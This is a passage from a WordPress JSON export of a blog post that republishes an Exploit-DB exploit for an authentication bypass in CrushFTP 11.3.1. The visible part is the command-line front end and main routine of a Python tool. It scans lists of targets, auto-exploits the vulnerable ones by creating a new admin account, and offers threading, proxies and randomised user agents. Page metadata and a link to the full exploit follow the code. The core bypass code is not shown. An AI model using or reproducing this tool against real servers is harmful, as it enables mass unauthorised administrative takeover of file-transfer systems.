&#8211;check &#8211;output results.json &#8211;format json<br \/>\n<br \/>        &#8220;&#8221;&#8221;<br \/>\n<br \/>    )<\/p>\n<p>    # Target specification<br \/>\n<br \/>    target_group = parser.add_argument_group(&#8220;Target Specification&#8221;)<br \/>\n<br \/>    target_group.add_argument(&#8220;&#8211;target&#8221;, help=&#8221;Single target host to scan\/exploit&#8221;)<br \/>\n<br \/>    target_group.add_argument(&#8220;&#8211;file&#8221;, help=&#8221;File containing list of targets (one per line)&#8221;)<br \/>\n<br \/>    target_group.add_argument(&#8220;&#8211;port&#8221;, type=int, default=443, help=&#8221;Target port (default: 443)&#8221;)<\/p>\n<p>    # Actions<br \/>\n<br \/>    action_group = parser.add_argument_group(&#8220;Actions&#8221;)<br \/>\n<br \/>    action_group.add_argument(&#8220;&#8211;check&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Check targets for vulnerability&#8221;)<br \/>\n<br \/>    action_group.add_argument(&#8220;&#8211;exploit&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Exploit vulnerable targets&#8221;)<br \/>\n<br \/>    action_group.add_argument(&#8220;&#8211;auto-exploit&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Automatically exploit targets found to be vulnerable during check&#8221;)<\/p>\n<p>    # Exploitation options<br \/>\n<br \/>    exploit_group = parser.add_argument_group(&#8220;Exploitation Options&#8221;)<br \/>\n<br \/>    exploit_group.add_argument(&#8220;&#8211;target-user&#8221;, default=&#8221;crushadmin&#8221;, help=&#8221;Target user for exploitation (default: crushadmin)&#8221;)<br \/>\n<br \/>    exploit_group.add_argument(&#8220;&#8211;new-user&#8221;, help=&#8221;Username for the new admin account to create&#8221;)<br \/>\n<br \/>    exploit_group.add_argument(&#8220;&#8211;password&#8221;, help=&#8221;Password for the new admin account&#8221;)<br \/>\n<br \/>    exploit_group.add_argument(&#8220;&#8211;verify-exploit&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Verify successful exploitation (default: True)&#8221;)<\/p>\n<p>    # Scan options<br \/>\n<br \/>    scan_group = parser.add_argument_group(&#8220;Scan Options&#8221;)<br \/>\n<br \/>    scan_group.add_argument(&#8220;&#8211;threads&#8221;, type=int, default=10, help=&#8221;Number of concurrent threads (default: 10)&#8221;)<br \/>\n<br \/>    scan_group.add_argument(&#8220;&#8211;timeout&#8221;, type=int, default=10, help=&#8221;Connection timeout in seconds (default: 10)&#8221;)<br \/>\n<br \/>    scan_group.add_argument(&#8220;&#8211;deep-check&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Perform deeper vulnerability checks&#8221;)<br \/>\n<br \/>    scan_group.add_argument(&#8220;&#8211;only-vulnerable&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Only exploit targets that were found vulnerable&#8221;)<\/p>\n<p>    # Output options<br \/>\n<br \/>    output_group = parser.add_argument_group(&#8220;Output Options&#8221;)<br \/>\n<br \/>    output_group.add_argument(&#8220;&#8211;output&#8221;, help=&#8221;Output file for results&#8221;)<br \/>\n<br \/>    output_group.add_argument(&#8220;&#8211;format&#8221;, choices=[&#8220;txt&#8221;, &#8220;json&#8221;, &#8220;csv&#8221;], default=&#8221;txt&#8221;, help=&#8221;Output format (default: txt)&#8221;)<br \/>\n<br \/>    output_group.add_argument(&#8220;&#8211;verbose&#8221;, &#8220;-v&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Enable verbose output&#8221;)<br \/>\n<br \/>    output_group.add_argument(&#8220;&#8211;quiet&#8221;, &#8220;-q&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Suppress all output except errors&#8221;)<br \/>\n<br \/>    output_group.add_argument(&#8220;&#8211;log-file&#8221;, help=&#8221;Log file to write to&#8221;)<br \/>\n<br \/>    output_group.add_argument(&#8220;&#8211;log-level&#8221;, choices=[&#8220;debug&#8221;, &#8220;info&#8221;, &#8220;warning&#8221;, &#8220;error&#8221;, &#8220;critical&#8221;], default=&#8221;info&#8221;, help=&#8221;Log level (default: info)&#8221;)<\/p>\n<p>    # Advanced options<br \/>\n<br \/>    advanced_group = parser.add_argument_group(&#8220;Advanced Options&#8221;)<br \/>\n<br \/>    advanced_group.add_argument(&#8220;&#8211;proxy&#8221;, help=&#8221;Proxy to use for requests (e.g., http:\/\/127.0.0.1:8080)&#8221;)<br \/>\n<br \/>    advanced_group.add_argument(&#8220;&#8211;user-agent&#8221;, help=&#8221;Custom User-Agent string&#8221;)<br \/>\n<br \/>    advanced_group.add_argument(&#8220;&#8211;random-agent&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Use a random User-Agent for each request&#8221;)<br \/>\n<br \/>    advanced_group.add_argument(&#8220;&#8211;delay&#8221;, type=float, help=&#8221;Delay between requests in seconds&#8221;)<br \/>\n<br \/>    advanced_group.add_argument(&#8220;&#8211;custom-headers&#8221;, help=&#8221;Custom headers as JSON string&#8221;)<\/p>\n<p>    return parser.parse_args()<\/p>\n<p>def validate_args(args: argparse.Namespace) -> bool:<br \/>\n<br \/>    &#8220;&#8221;&#8221;Validate command line arguments.&#8221;&#8221;&#8221;<br \/>\n<br \/>    # Check if at least one target specification is provided<br \/>\n<br \/>    if not args.target and not args.file:<br \/>\n<br \/>        logging.error(&#8220;No target specified. Use &#8211;target or &#8211;file&#8221;)<br \/>\n<br \/>        print(f&#8221;\\nExample usage: python {sys.argv[0]} &#8211;target example.com &#8211;check&#8221;)<br \/>\n<br \/>        print(f&#8221;             python {sys.argv[0]} &#8211;file example_targets.txt &#8211;check&#8221;)<br \/>\n<br \/>        return False<\/p>\n<p>    # Check if at least one action is specified<br \/>\n<br \/>    if not args.check and not args.exploit:<br \/>\n<br \/>        logging.error(&#8220;No action specified. Use &#8211;check or &#8211;exploit&#8221;)<br \/>\n<br \/>        print(f&#8221;\\nExample usage: python {sys.argv[0]} &#8211;target example.com &#8211;check&#8221;)<br \/>\n<br \/>        print(f&#8221;             python {sys.argv[0]} &#8211;target example.com &#8211;exploit &#8211;new-user admin &#8211;password P@ssw0rd&#8221;)<br \/>\n<br \/>        return False<\/p>\n<p>    # If exploit action is specified, check for required parameters<br \/>\n<br \/>    if args.exploit and (not args.new_user or not args.password):<br \/>\n<br \/>        logging.error(&#8220;Exploitation requires &#8211;new-user and &#8211;password&#8221;)<br \/>\n<br \/>        print(f&#8221;\\nExample usage: python {sys.argv[0]} &#8211;target example.com &#8211;exploit &#8211;new-user admin &#8211;password P@ssw0rd&#8221;)<br \/>\n<br \/>        return False<\/p>\n<p>    return True<\/p>\n<p>def main() -> None:<br \/>\n<br \/>    &#8220;&#8221;&#8221;Main function.&#8221;&#8221;&#8221;<br \/>\n<br \/>    # Parse command line arguments<br \/>\n<br \/>    args = parse_arguments()<\/p>\n<p>    # Configure logging<br \/>\n<br \/>    log_level = &#8220;error&#8221; if args.quiet else args.log_level<br \/>\n<br \/>    setup_logging(log_level, args.log_file)<\/p>\n<p>    # Display banner<br \/>\n<br \/>    if not args.quiet:<br \/>\n<br \/>        console.print(BANNER)<\/p>\n<p>    # Validate arguments<br \/>\n<br \/>    if not validate_args(args):<br \/>\n<br \/>        sys.exit(1)<\/p>\n<p>    # Create target manager<br \/>\n<br \/>    target_manager = TargetManager(args.file, args.target)<\/p>\n<p>    # Build configuration dictionary<br \/>\n<br \/>    config = {<br \/>\n<br \/>        &#8220;port&#8221;: args.port,<br \/>\n<br \/>        &#8220;threads&#8221;: args.threads,<br \/>\n<br \/>        &#8220;timeout&#8221;: args.timeout,<br \/>\n<br \/>        &#8220;verbose&#8221;: args.verbose,<br \/>\n<br \/>        &#8220;deep_check&#8221;: args.deep_check,<br \/>\n<br \/>        &#8220;target_user&#8221;: args.target_user,<br \/>\n<br \/>        &#8220;new_user&#8221;: args.new_user,<br \/>\n<br \/>        &#8220;password&#8221;: args.password,<br \/>\n<br \/>        &#8220;only_vulnerable&#8221;: args.only_vulnerable,<br \/>\n<br \/>        &#8220;verify_exploit&#8221;: args.verify_exploit,<br \/>\n<br \/>        &#8220;proxy&#8221;: args.proxy,<br \/>\n<br \/>    }<\/p>\n<p>    # Add custom headers if provided<br \/>\n<br \/>    if args.custom_headers:<br \/>\n<br \/>        try:<br \/>\n<br \/>            config[&#8220;custom_headers&#8221;] = json.loads(args.custom_headers)<br \/>\n<br \/>        except json.JSONDecodeError:<br \/>\n<br \/>            logging.error(&#8220;Invalid JSON format for custom headers&#8221;)<br \/>\n<br \/>            sys.exit(1)<\/p>\n<p>    # Add custom user agent if provided<br \/>\n<br \/>    if args.user_agent:<br \/>\n<br \/>        config[&#8220;user_agent&#8221;] = args.user_agent<\/p>\n<p>    # Create exploit engine<br \/>\n<br \/>    engine = ExploitEngine(target_manager, config)<\/p>\n<p>    # Perform actions<br \/>\n<br \/>    if args.check:<br \/>\n<br \/>        engine.scan_targets()<\/p>\n<p>    if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):<br \/>\n<br \/>        engine.exploit_targets()<\/p>\n<p>    # Save results if output file is specified<br \/>\n<br \/>    if args.output:<br \/>\n<br \/>        target_manager.save_results(args.output, args.format)<\/p>\n<p>    # Display summary<br \/>\n<br \/>    if not args.quiet:<br \/>\n<br \/>        console.print(&#8220;\\n[bold green]Summary:[\/bold green]&#8221;)<br \/>\n<br \/>        console.print(f&#8221;Total targets: {len(target_manager.targets)}&#8221;)<br \/>\n<br \/>        console.print(f&#8221;Vulnerable targets: {len(target_manager.vulnerable_targets)}&#8221;)<br \/>\n<br \/>        console.print(f&#8221;Exploited targets: {len(target_manager.exploited_targets)}&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>\n<br \/>    try:<br \/>\n<br \/>        main()<br \/>\n<br \/>    except KeyboardInterrupt:<br \/>\n<br \/>        console.print(&#8220;\\n[bold red]Operation cancelled by user[\/bold red]&#8221;)<br \/>\n<br \/>        sys.exit(0)<br \/>\n<br \/>    except Exception as e:<br \/>\n<br \/>        logging.error(f&#8221;Unhandled exception: {e}&#8221;)<br \/>\n<br \/>        sys.exit(1)\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52295\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title CrushFTP 11.3.1 &#8211; Authentication Bypass Exploit ID EDB-ID:52295 Type exploitdb Published 2025-05-18T00:00:00 Modified 2025-05-18T00:00:00 CVSS Information CVSS Score 9.8&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-4976","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>CrushFTP 11.3.1 - Authentication Bypass - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=4976\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CrushFTP 11.3.1 - Authentication Bypass - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title CrushFTP 11.3.1 &#8211; Authentication Bypass Exploit ID EDB-ID:52295 Type exploitdb Published 2025-05-18T00:00:00 Modified 2025-05-18T00:00:00 CVSS Information CVSS Score 9.8...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=4976\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-18T11:34:04+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=4976#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=4976\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"CrushFTP 11.3.1 &#8211; Authentication Bypass\",\"datePublished\":\"2025-05-18T11:34:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=4976\"},\"wordCount\":2972,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=4976#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=4976\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=4976\",\"name\":\"CrushFTP 11.3.1 - Authentication Bypass - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-18T11:34:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=4976#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=4976\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=4976#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CrushFTP 11.3.1 &#8211; Authentication Bypass\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CrushFTP 11.3.1 - Authentication Bypass - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=4976","og_locale":"en_US","og_type":"article","og_title":"CrushFTP 11.3.1 - Authentication Bypass - zero redgem","og_description":"Exploit Details Basic Information Exploit Title CrushFTP 11.3.1 &#8211; Authentication Bypass Exploit ID EDB-ID:52295 Type exploitdb Published 2025-05-18T00:00:00 Modified 2025-05-18T00:00:00 CVSS Information CVSS Score 9.8...","og_url":"https:\/\/zero.redgem.net\/?p=4976","og_site_name":"zero redgem","article_published_time":"2025-05-18T11:34:04+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=4976#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=4976"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"CrushFTP 11.3.1 &#8211; Authentication Bypass","datePublished":"2025-05-18T11:34:04+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=4976"},"wordCount":2972,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=4976#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=4976","url":"https:\/\/zero.redgem.net\/?p=4976","name":"CrushFTP 11.3.1 - Authentication Bypass - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-18T11:34:04+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=4976#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=4976"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=4976#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"CrushFTP 11.3.1 &#8211; Authentication Bypass"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/4976","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4976"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/4976\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4976"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}